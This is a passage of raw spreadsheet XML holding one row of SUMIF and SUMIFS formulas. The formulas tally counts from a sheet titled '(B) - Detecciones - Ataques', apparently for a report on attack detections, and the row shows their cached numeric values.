        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BE3:BE139)</f>
        <v>588</v>
      </c>
      <c r="L40" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CS3:CS139)</f>
        <v>1181</v>
      </c>
      <c r="M40" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EI3:EI139)</f>
        <v>1325</v>
      </c>
      <c r="N40" s="351">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FY3:FY139)</f>
        <v>1342</v>
      </c>
      <c r="O40" s="278"/>
      <c r="Q40" s="271"/>
      <c r="R40" s="386" t="s">
        <v>2483</v>
      </c>
      <c r="S40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="T40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="V40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="W40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Z40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>566</v>
      </c>
      <c r="AA40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AB40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AC40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AD40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AE40" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AF40" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AG40" s="271"/>
      <c r="AH40" s="386" t="s">
        <v>2483</v>
      </c>
      <c r="AI40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>0</v>
      </c>
      <c r="AJ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>1</v>
      </c>
      <c r="AR40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>0</v>
      </c>
      <c r="AS40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>0</v>
      </c>
      <c r="AV40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>0</v>
      </c>
      <c r="AY40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>0</v>
      </c>
      <c r="BD40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>566</v>
      </c>
      <c r="BN40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>0</v>
      </c>
      <c r="BO40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>0</v>
      </c>
      <c r="CQ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>0</v>
      </c>
      <c r="CU40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI40" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ40" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BE3:$BE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>0</v>
      </c>
      <c r="DK40" s="271"/>
      <c r="DO40" s="357"/>
      <c r="DP40" s="358" t="s">
        <v>292</v>
      </c>
      <c r="DQ40" s="359">
        <v>0.0</v>
      </c>
      <c r="DR40" s="359">
        <v>0.0</v>
      </c>
      <c r="DS40" s="359">
        <v>0.0</v>
      </c>
      <c r="DT40" s="359">
        <v>0.0</v>
      </c>
      <c r="DU40" s="360">
        <v>1.0</v>
      </c>
      <c r="DV40" s="271"/>
      <c r="DW40" s="358" t="s">
        <v>292</v>
      </c>
      <c r="DX40" s="359">
        <v>0.0</v>
      </c>
      <c r="DY40" s="359">
        <v>0.0</v>
      </c>
      <c r="DZ40" s="359">
        <v>0.0</v>
      </c>
      <c r="EA40" s="359">
        <v>1.0</v>
      </c>
      <c r="EB40" s="360">
        <v>2.0</v>
      </c>
      <c r="EC40" s="271"/>
      <c r="ED40" s="280"/>
